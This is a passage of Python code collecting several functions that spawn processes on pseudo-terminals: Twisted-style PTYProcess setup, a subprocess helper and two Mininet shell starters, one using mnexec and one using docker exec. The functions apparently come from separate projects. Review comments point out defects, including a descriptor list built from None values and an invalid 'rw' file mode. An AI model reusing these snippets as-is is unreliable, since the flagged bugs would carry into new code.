            ready, _, _ = gs.select([master_fd], [], [], timeout)
        except gs.error as ex:
            # Error number 4 is retried (presumably EINTR - confirm);
            # anything else propagates.
            if ex[0] == 4:
                continue
            else:
                raise
        if ready:
            data = os.read(master_fd, 512)
            outputs += data
            if not data:
                break
        elif proc.poll() is not None:
            # Nothing readable within the timeout and the process is gone.
            break
    os.close(slave_fd)
    os.close(master_fd)
    proc.wait()
    status = proc.returncode
    return (status, outputs)
def __init__(self, reactor, executable, args, environment, path, proto, uid=None, gid=None, usePTY=None):
    """
    Spawn an operating-system process.

    This is where the hard work of disconnecting all currently open
    files / forking / executing the new process happens.  (This is
    executed automatically when a Process is instantiated.)

    This will also run the subprocess as a given user ID and group ID, if
    specified.  (Implementation Note: this doesn't support all the arcane
    nuances of setXXuid on UNIX: it will assume that either your effective
    or real UID is 0.)

    C{usePTY} may be a tuple or list of three items, of which the first two
    are used as the master and slave file descriptors; otherwise a new
    pair is opened with C{pty.openpty()}.

    @raise NotImplementedError: if the C{pty} module is unavailable and no
        descriptor tuple/list was supplied through C{usePTY}.
    """
    if pty is None and not isinstance(usePTY, (tuple, list)):
        # no pty module and we didn't get a pty to use
        raise NotImplementedError(
            "cannot use PTYProcess on platforms without the pty module.")
    abstract.FileDescriptor.__init__(self, reactor)
    _BaseProcess.__init__(self, proto)

    if isinstance(usePTY, (tuple, list)):
        masterfd, slavefd, _ = usePTY
    else:
        masterfd, slavefd = pty.openpty()

    try:
        self._fork(path, uid, gid, executable, args, environment,
                   masterfd=masterfd, slavefd=slavefd)
    except:
        # Only descriptors opened here are closed on failure; a pair
        # supplied by the caller is left alone.
        if not isinstance(usePTY, (tuple, list)):
            os.close(masterfd)
            os.close(slavefd)
        raise

    # we are now in parent process:
    os.close(slavefd)
    fdesc.setNonBlocking(masterfd)
    self.fd = masterfd
    self.startReading()
    self.connected = 1
    self.status = -1
    try:
        self.proto.makeConnection(self)
    except:
        # A failure in the protocol's makeConnection is logged, not raised.
        log.err()
    registerReapProcessHandler(self.pid, self)
def _setupChild(self, masterfd, slavefd):
    """
    Set up child process after C{fork()} but before C{exec()}.

    This involves:

        - closing C{masterfd}, since it is not used in the subprocess

        - creating a new session with C{os.setsid}

        - changing the controlling terminal of the process (and the new
          session) to point at C{slavefd}

        - duplicating C{slavefd} to standard input, output, and error

        - closing all other open file descriptors (according to
          L{_listOpenFDs})

        - re-setting all signal handlers to C{SIG_DFL}

    @param masterfd: The master end of a PTY file descriptors opened with
        C{openpty}.
    @type masterfd: L{int}

    @param slavefd: The slave end of a PTY opened with C{openpty}.
    @type slavefd: L{int}
    """
    os.close(masterfd)
    os.setsid()
    fcntl.ioctl(slavefd, termios.TIOCSCTTY, '')

    # Free descriptors 0-2 before duplicating slavefd onto them, taking
    # care not to close slavefd itself if it happens to be one of them.
    for fd in range(3):
        if fd != slavefd:
            os.close(fd)

    os.dup2(slavefd, 0)  # stdin
    os.dup2(slavefd, 1)  # stdout
    os.dup2(slavefd, 2)  # stderr

    # Close everything above stderr; failures to close are ignored.
    for fd in _listOpenFDs():
        if fd > 2:
            try:
                os.close(fd)
            except:
                pass

    self._resetSignalDisposition()
def _execute_process_pty(cmd, cwd, env, shell, stderr_to_stdout=True):
    # Start `cmd` with its stdio on pseudo-terminals and return whatever
    # _yield_data() produces for the process and the master descriptors.
    #
    # stderr_to_stdout: when true a single PTY pair is shared; otherwise a
    # second pair is opened for the "stderr" names.
    stdout_master, stdout_slave = None, None
    stderr_master, stderr_slave = None, None
    # NOTE(review): this list is built while all four names are still None
    # and is not updated after openpty(), so it holds four None values when
    # it reaches _close_fds() and _yield_data() - confirm that is intended.
    fds_to_close = [stdout_master, stdout_slave, stderr_master, stderr_slave]
    try:
        stdout_master, stdout_slave = pty.openpty()
        if stderr_to_stdout:
            stderr_master, stderr_slave = stdout_master, stdout_slave
        else:
            stderr_master, stderr_slave = pty.openpty()

        p = None
        while p is None:
            try:
                # NOTE(review): the child's stdin is stdout_slave and both
                # its stdout and stderr go to stderr_slave (stderr=STDOUT).
                p = Popen(
                    cmd,
                    stdin=stdout_slave, stdout=stderr_slave, stderr=STDOUT,
                    cwd=cwd, env=env, shell=shell, close_fds=False)
            except OSError as exc:
                # This can happen if a file you are trying to execute is being
                # written to simultaneously on Linux
                # (doesn't appear to happen on OS X)
                # It seems like the best strategy is to just try again later
                # Worst case is that the file eventually gets deleted, then a
                # different OSError would occur.
                if 'Text file busy' in '{0}'.format(exc):
                    # This is a transient error, try again shortly
                    time.sleep(0.01)
                    continue
                raise
        # This causes the below select to exit when the subprocess closes.
        # On Linux, this sometimes causes Errno 5 OSError's when os.read
        # is called from within _yield_data, so on Linux _yield_data
        # catches and passes on that particular OSError.
        os.close(stdout_slave)
        if not stderr_to_stdout:
            os.close(stderr_slave)

        # Per-descriptor buffers handed to _yield_data, initially empty.
        left_overs = {stdout_master: b'', stderr_master: b''}

        fds = [stdout_master]
        if stderr_master != stdout_master:
            fds.append(stderr_master)
    finally:
        # Make sure we don't leak file descriptors
        # NOTE(review): as a `finally` clause this also runs on the success
        # path, before the return below.
        _close_fds(fds_to_close)

    # The linesep with pty's always seems to be "\r\n", even on OS X
    return _yield_data(p, fds, left_overs, "\r\n", fds_to_close)
def startShell( self, mnopts=None ):
    "Start a shell process for running commands"
    # mnopts: option string passed to mnexec; defaults to '-cd'.  'n' is
    # appended when self.inNamespace is true.
    # Does nothing except report an error if a shell is already running.
    if self.shell:
        error( "%s: shell is already running\n" % self.name )
        return
    # mnexec: (c)lose descriptors, (d)etach from tty,
    # (p)rint pid, and run in (n)amespace
    opts = '-cd' if mnopts is None else mnopts
    if self.inNamespace:
        opts += 'n'
    # bash -i: force interactive
    # -s: pass $* to shell, and make process easy to find in ps
    # prompt is set to sentinel chr( 127 )
    cmd = [ 'mnexec', opts, 'env', 'PS1=' + chr( 127 ),
            'bash', '--norc', '-is', 'mininet:' + self.name ]
    # Spawn a shell subprocess in a pseudo-tty, to disable buffering
    # in the subprocess and insulate it from signals (e.g. SIGINT)
    # received by the parent
    master, slave = pty.openpty()
    self.shell = self._popen( cmd, stdin=slave, stdout=slave, stderr=slave,
                              close_fds=False )
    # One file object over the master serves as both stdin and stdout.
    # NOTE(review): 'rw' is not a mode Python 3's open()/fdopen() accepts,
    # and the slave fd is not closed in this method - confirm both.
    self.stdin = os.fdopen( master, 'rw' )
    self.stdout = self.stdin
    self.pid = self.shell.pid
    self.pollOut = select.poll()
    self.pollOut.register( self.stdout )
    # Maintain mapping between file descriptors and nodes
    # This is useful for monitoring multiple nodes
    # using select.poll()
    self.outToNode[ self.stdout.fileno() ] = self
    self.inToNode[ self.stdin.fileno() ] = self
    self.execed = False
    self.lastCmd = None
    self.lastPid = None
    self.readbuf = ''
    # Wait for prompt
    while True:
        data = self.read( 1024 )
        # NOTE(review): data[ -1 ] would raise IndexError if self.read()
        # ever returned an empty value - verify against self.read().
        if data[ -1 ] == chr( 127 ):
            break
        self.pollOut.poll()
    self.waiting = False
    # +m: disable job control notification
    self.cmd( 'unset HISTFILE; stty -echo; set +m' )
def startShell( self, *args, **kwargs ):
    "Start a shell process for running commands"
    # *args / **kwargs are accepted but not used in this method.
    # Does nothing except report an error if a shell is already running.
    if self.shell:
        error( "%s: shell is already running\n" % self.name )
        return
    # mnexec: (c)lose descriptors, (d)etach from tty,
    # (p)rint pid, and run in (n)amespace
    # opts = '-cd' if mnopts is None else mnopts
    # if self.inNamespace:
    #     opts += 'n'
    # bash -i: force interactive
    # -s: pass $* to shell, and make process easy to find in ps
    # prompt is set to sentinel chr( 127 )
    # The shell is started with `docker exec` inside the container named
    # "<dnameprefix>.<name>".
    cmd = [ 'docker', 'exec', '-it', '%s.%s' % ( self.dnameprefix, self.name ),
            'env', 'PS1=' + chr( 127 ),
            'bash', '--norc', '-is', 'mininet:' + self.name ]
    # Spawn a shell subprocess in a pseudo-tty, to disable buffering
    # in the subprocess and insulate it from signals (e.g. SIGINT)
    # received by the parent
    master, slave = pty.openpty()
    self.shell = self._popen( cmd, stdin=slave, stdout=slave, stderr=slave,
                              close_fds=False )
    # One file object over the master serves as both stdin and stdout.
    # NOTE(review): 'rw' is not a mode Python 3's open()/fdopen() accepts,
    # and the slave fd is not closed in this method - confirm both.
    self.stdin = os.fdopen( master, 'rw' )
    self.stdout = self.stdin
    # The PID comes from self._get_pid() rather than from the Popen object.
    self.pid = self._get_pid()
    self.pollOut = select.poll()
    self.pollOut.register( self.stdout )
    # Maintain mapping between file descriptors and nodes
    # This is useful for monitoring multiple nodes
    # using select.poll()
    self.outToNode[ self.stdout.fileno() ] = self
    self.inToNode[ self.stdin.fileno() ] = self
    self.execed = False
    self.lastCmd = None
    self.lastPid = None
    self.readbuf = ''
    # Wait for prompt
    while True:
        data = self.read( 1024 )
        # NOTE(review): data[ -1 ] would raise IndexError if self.read()
        # ever returned an empty value - verify against self.read().
        if data[ -1 ] == chr( 127 ):
            break
        self.pollOut.poll()
    self.waiting = False
    # +m: disable job control notification
    self.cmd( 'unset HISTFILE; stty -echo; set +m' )